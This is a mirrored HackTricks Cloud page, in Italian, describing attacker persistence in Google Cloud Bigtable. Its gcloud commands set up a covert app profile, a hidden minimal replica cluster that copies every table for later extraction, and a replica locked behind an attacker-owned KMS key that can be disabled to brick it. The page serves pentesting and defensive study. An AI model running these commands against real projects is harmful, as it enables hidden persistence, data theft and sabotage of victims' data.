gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-10 20:23:28 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
04fb73401ce23710f2465da4f36832810d7e12f3
hacktricks-cloud/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigtable-persistence.md

2.3 KiB
Raw Blame History

GCP - Bigtable Persistence

{{#include ../../../banners/hacktricks-training.md}}

Bigtable

Per maggiori informazioni su Bigtable consulta:

{{#ref}} ../gcp-services/gcp-bigtable-enum.md {{#endref}}

App Profile dedicato all'attaccante

Permissions: bigtable.appProfiles.create, bigtable.appProfiles.update.

Crea un app profile che instrada il traffico verso il tuo replica cluster e abilita Data Boost in modo da non dipendere mai da provisioned nodes che i difensori potrebbero notare.

gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
--row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile \
--instance=<instance-id> --data-boost \
--data-boost-compute-billing-owner=HOST_PAYS

Finché questo profilo esiste, puoi riconnetterti usando credenziali nuove che fanno riferimento ad esso.

Mantieni il tuo cluster di replica

Permessi: bigtable.clusters.create, bigtable.instances.update, bigtable.clusters.list.

Crea un cluster con il numero minimo di nodi in una regione poco trafficata. Anche se le tue identità client scompaiono, il cluster conserva una copia completa di ogni tabella fino a quando i difensori non lo rimuovono esplicitamente.

gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

Tienilo d'occhio con gcloud bigtable clusters describe dark-clone --instance=<instance-id> così puoi scalare immediatamente quando devi estrarre dati.

Blocca la replica dietro il tuo CMEK

Permessi: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt on the attacker-owned key.

Usa la tua chiave KMS quando avvii uno clone. Senza quella chiave, Google non può ricreare o eseguire il failover del cluster, quindi le blue teams devono coordinarsi con te prima di toccarlo.

gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>

Ruota o disabilita la key nel tuo project per brickare istantaneamente la replica (pur permettendoti di riattivarla in seguito).

{{#include ../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink